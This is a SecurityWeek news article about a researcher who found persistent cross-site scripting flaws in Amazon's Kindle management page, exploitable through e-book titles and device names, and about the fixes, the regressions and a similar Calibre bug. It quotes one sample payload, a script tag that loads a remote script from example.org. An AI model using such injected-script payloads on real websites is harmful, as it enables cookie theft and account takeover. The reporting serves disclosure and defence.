Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Vulnerabilities

Amazon Fixes Persistent XSS Vulnerability Affecting Kindle Library

Amazon has addressed a security hole that enabled attackers to inject malicious code into the company’s website and potentially compromise user accounts, a researcher reported on Tuesday.

Amazon has addressed a security hole that enabled attackers to inject malicious code into the company’s website and potentially compromise user accounts, a researcher reported on Tuesday.

Benjamin Daniel Mussler from Germany identified a persistent cross-site scripting (XSS) vulnerability on the Amazon webpage where users manage their Kindle e-book readers. According to the expert, an attacker could inject malicious code through e-book metadata. For example, he could add a book title containing code such as: <script src=”https://www.example.org/script.js”></script>.

If a victim adds this “book” to his/her library, the code is executed as soon as the Kindle library webpage is opened.

“As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised,” Mussler explained in a blog post.

The researcher also pointed out that it’s unlikely that Amazon will allow e-books with malicious code as a title to be added to its store. However, an attacker could plant such e-books on third-party websites. The malicious code gets executed if the victim uses Amazon’s “Send to Kindle” service to copy them to the device.

The issue was first reported to Amazon in November 2013 through the company’s [email protected] email address. Amazon rolled out a fix by December 6, 2013. However, with the redesign of the “Manage your Kindle” webpage, the company reintroduced the vulnerability.

Mussler realized that the flaw had been reintroduced in July, when he notified Amazon once again. However, since the company didn’t respond to the researcher’s second report, he decided to go public with his findings on Friday. In an update made to his initial blog post, Mussler reported that the issue was fixed by Amazon on Tuesday.

Kindle users who organize their e-books with third-party applications could also be affected by such vulnerabilities. The researcher has identified a similar security hole in the open source library manager Calibre. Fortunately, unlike Amazon, Calibre developers addressed the vulnerability the next day after it was reported.

Advertisement. Scroll to continue reading.

A different persistent XSS vulnerability identified by Mussler could have been triggered via the Kindle device name. When Kindle users set a name for their e-book readers from the Amazon website, they’re not allowed to use characters such as “<” and “>,” which are usually present in malicious scripts. However, these characters are not filtered when setting the device name directly from the Kindle.

An attacker with physical access to the reader could have set malicious code as device name. When the victim would visit his/her “Manage your Kindle” webpage, the code would be executed.

This vulnerability was reported to Amazon in October 2013 and it was fixed in mid-December 2013. However, it too was reintroduced sometime this year when the company redesigned the “Manage your Kindle” webpage. Amazon silently addressed the flaw for the second time sometime in July 2014.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

Cyber exposure management firm Armis has promoted Alex Mosher to President.

Software giant Atlassian has named David Cross as its new CISO.

Dan Pagel has been named the new CEO of risk management and remediation firm Brinqa.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.